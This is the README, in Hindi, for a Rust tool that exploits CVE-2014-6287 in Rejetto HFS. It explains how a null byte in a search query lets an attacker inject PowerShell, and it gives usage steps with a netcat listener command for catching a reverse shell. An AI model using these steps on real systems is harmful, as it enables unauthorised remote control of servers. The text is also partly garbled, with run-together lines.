
CVE-2014-6287 एक्सप्लॉइट का एक Rust कार्यान्वयन जो Rejetto HTTP फ़ाइल सर्वर (HFS) संस्करण 2.3x से पहले 2.3c को लक्षित करता है।
CVE-2014-6287 शोषण का एक Rust कार्यान्वयन जो Rejetto HTTP File Server (HFS) के संस्करण 2.3x (2.3c से पहले) को लक्षित करता है।
CVE-2014-6287 Rejetto HTTP File Server (HFS) में एक गंभीर दूरस्थ कोड निष्पादन भेद्यता है।
Rejetto HTTP File Server में parserLib.pas में findMacroMarker फ़ंक्शन दूरस्थ हमलावरों को एक खोज क्रिया में %00 अनुक्रम के माध्यम से मनमाने प्रोग्राम निष्पादित करने की अनुमति देता है। यह भेद्यता हमलावरों को इनपुट सत्यापन को बायपास करने और दुर्भावनापूर्ण कोड इंजेक्ट करने में सक्षम बनाती है जो लक्ष्य सिस्टम पर निष्पादित होता है।
शोषण निम्नलिखित तरीके से काम करता है:
%00) युक्त दुर्भावनापूर्ण खोज क्वेरी तैयार करना{. और .} के भीतर PowerShell कमांड इंजेक्ट करनाशोषण को निष्पादित करने से पहले, अपनी हमलावर मशीन पर रिवर्स शेल को पकड़ने के लिए एक लिसनर सेट अप करें:
# Replace <LPORT> with your desired listening port
nc -lvnp <LPORT>
cargo run -- -l <LHOST> -p <LPORT> -r <RHOST> [-t <RPORT>]
-l, --lhost <LHOST>: आपका स्थानीय IP पता (हमलावर मशीन)-p, --lport <LPORT>: रिवर्स शेल के लिए आपका स्थानीय पोर्ट-r, --rhost <RHOST>: लक्ष्य IP पता (कमजोर HFS सर्वर)-t, --rport <RPORT>: लक्ष्य पोर्ट (डिफ़ॉल्ट: 80)यह उपकरण केवल शैक्षिक और अधिकृत पैठ परीक्षण उद्देश्यों के लिए है। जिम्मेदारी से उपयोग करें और केवल उन सिस्टमों पर जिनके आप मालिक हैं या जिनके लिए आपके पास स्पष्ट अनुमति